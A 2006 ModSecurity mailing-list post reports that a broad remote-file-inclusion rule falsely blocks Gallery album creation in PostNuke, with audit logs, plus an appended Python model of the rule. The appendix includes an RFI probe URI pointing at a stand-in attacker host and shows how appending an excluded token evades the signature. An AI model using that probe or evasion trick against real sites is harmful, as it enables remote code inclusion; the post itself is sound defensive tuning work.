[Modsecurity] False Positive from Gallery application
Elric Melnibone
Elric_Melnibone at elricm.com
Sat Jun 10 21:39:05 EDT 2006
This rule:
#really broad furl_fopen attack sig
#tune this for your system
SecFilterSelective REQUEST_URI "!(banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main)" chain
SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)"
Causes a false positive when a Gallery user tries to create a new album, at
least for sites that have Gallery embedded into PostNuke, which two of the
domains on my server do.
Here are two audit entries from two different users:
==a3a30c72==============================
Request: www.DOMAINA.com <IP ADDRESS> - - [10/Jun/2006:20:28:25 --0500] "GET /nuke/html/modules/gallery/do_command.php?return=http%3A%2F%2Fwww.DOMAINA.com%2Fnuke%2Fhtml%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1" 500 1402 "http://www.DOMAINA.com/nuke/html/modules/gallery/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" wAp60UIczXUAAFyP0c8AAAAM "-"
----------------------------------------
GET /nuke/html/modules/gallery/do_command.php?return=http%3A%2F%2Fwww.DOMAINA.com%2Fnuke%2Fhtml%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.DOMAINA.com/nuke/html/modules/gallery/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: www.DOMAINA.com
Connection: Keep-Alive
Cookie: POSTNUKESID=f4a0458a85a5ff7cc62c85510811469f; POSTNUKESID=aec2dac49a491e304beaa804257b632d; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3BN%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; gallery_session_add_photos_mode=form; phpbb2mysql_sid=5c52ed124857e5d615753e6bd65d0421; phpbb2mysql_t=a%3A3%3A%7Bi%3A1057%3Bi%3A1149827453%3Bi%3A114%3Bi%3A1149861963%3Bi%3A1058%3Bi%3A1149862021%3B%7D; PHPSESSID=aa50a71cddfcc06039a7a5d6dfe368c4; testing=1; sid=8c8eb42eadfcdc742030e34513a7e951
mod_security-action: 500
mod_security-message: Access denied with code 500. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI
HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 06 Sep 2005 04:00:25 GMT
ETag: "134043-57a-77bb0840"
Accept-Ranges: bytes
Content-Length: 1402
Connection: close
Content-Type: text/html
--a3a30c72--
==c164ef16==============================
Request: morrowind.DOMAINB.com <IP ADDRESS> - - [10/Jun/2006:20:23:27 --0500] "GET /modules/gallery/do_command.php?return=http%3A%2F%2Fmorrowind.DOMAINB.com%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1" 500 1408 "http://morrowind.DOMAINB.com/modules/gallery/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" rkLfukIczXUAAAY8gMAAAAAI "-"
----------------------------------------
GET /modules/gallery/do_command.php?return=http%3A%2F%2Fmorrowind.DOMAINB.com%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1
Accept: */*
Referer: http://morrowind.DOMAINB.com/modules/gallery/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: morrowind.DOMAINB.com
Connection: Keep-Alive
Cookie: pnphpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D; POSTNUKESID=df57897f8dcbe1c40eb870d8789843c5; PHPSESSID=34c42d9461125024a0929be9e98201a1
mod_security-action: 500
mod_security-message: Access denied with code 500. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI
HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 06 Sep 2005 04:01:49 GMT
ETag: "db401f-580-7cbcc540"
Accept-Ranges: bytes
Content-Length: 1408
Connection: close
Content-Type: text/html
--c164ef16--
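Added example (editor's note, not part of the original message): a Python model of the two-filter chain above, run over the two request URIs from the audit entries. It shows exactly which substring the second filter matches (the legitimate `return=http://...view_album.php` redirect target followed by `&cmd=`), why the first filter's exclusion list does not rescue it (the list only covers `gallery2?/main`, not `gallery/do_command.php`), and how one possible tuning of the exclusion would behave. The two regexes are copied from the rule as posted. Everything else is an assumption or a construction of mine, not something the poster proposed: the single URL-decode before matching (inferred because the log records `%3A%2F%2F` yet a pattern requiring a literal `:/` fired), the `gallery/do_command\.php` exclusion, the RFI probe URI and the evasion URI.

```python
import re
from urllib.parse import unquote

# Both SecFilterSelective patterns from the post, transcribed verbatim.
# Stage 1 is the negated path exclusion ("!" in the rule); stage 2 is the
# remote-file-inclusion signature that fires on "...php?...=http:/...?" or "&".
EXCLUSION_RE = re.compile(
    r"(banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go"
    r"|/goto|gallery2?/main)"
)
RFI_RE = re.compile(r"\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)")


def normalize(request_uri):
    """URL-decode once before matching (assumption).

    The audit log records the URI with %3A%2F%2F, yet a pattern that needs a
    literal ':/' fired, so ModSecurity must have matched the decoded form.
    A single unquote() models that here.
    """
    return unquote(request_uri)


def rfi_match_text(request_uri):
    """Return the substring stage 2 matched, or None. Shows that the trailing
    (\\?|&) is satisfied by the '&cmd=' following the 'return=' redirect."""
    m = RFI_RE.search(normalize(request_uri))
    return m.group(0) if m else None


def chain_denies(request_uri, exclusion_re=EXCLUSION_RE):
    """Evaluate the two-filter chain: denied only if stage 1 does NOT match
    (the '!' filter passes) and stage 2 does match."""
    uri = normalize(request_uri)
    if exclusion_re.search(uri):
        return False  # excluded path: chain stops, request allowed
    return RFI_RE.search(uri) is not None


# Constructed inputs. The first two are the request URIs from the audit log
# (placeholder domains as in the post); the third is a made-up RFI probe of
# the kind the signature exists to catch (hypothetical host).
GALLERY_A = ("/nuke/html/modules/gallery/do_command.php?return="
             "http%3A%2F%2Fwww.DOMAINA.com%2Fnuke%2Fhtml%2Fmodules%2Fgallery"
             "%2Fview_album.php&cmd=new-album")
GALLERY_B = ("/modules/gallery/do_command.php?return="
             "http%3A%2F%2Fmorrowind.DOMAINB.com%2Fmodules%2Fgallery"
             "%2Fview_album.php&cmd=new-album")
RFI_PROBE = "/index.php?page=http://attacker.example/shell.txt?"

# Hypothetical tuning, not proposed in the post: add the Gallery command
# script to the stage-1 exclusion so its self-referential redirect never
# reaches stage 2. Everything else is the original alternation.
TUNED_EXCLUSION_RE = re.compile(
    r"(banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go"
    r"|/goto|gallery2?/main|gallery/do_command\.php)"
)


def tuned_chain_denies(request_uri):
    return chain_denies(request_uri, TUNED_EXCLUSION_RE)


# Caveat: the exclusion is an unanchored search over the whole REQUEST_URI,
# query string included, so any request carrying an excluded token anywhere
# skips stage 2. Constructed example: the probe with a listed token appended.
EVASION_PROBE = RFI_PROBE + "&x=/goto"


if __name__ == "__main__":
    for label, uri in [("DOMAINA", GALLERY_A), ("DOMAINB", GALLERY_B),
                       ("probe", RFI_PROBE), ("evasion", EVASION_PROBE)]:
        print(f"{label:8} original: {'DENY' if chain_denies(uri) else 'allow':5} "
              f"tuned: {'DENY' if tuned_chain_denies(uri) else 'allow':5} "
              f"matched: {rfi_match_text(uri)!r}")
```

The evasion case is the cost of whitelisting with a negated substring filter rather than anchoring the exclusion to the script path: whichever token is added to rescue Gallery also becomes a token an attacker can append to any request to step around the RFI signature.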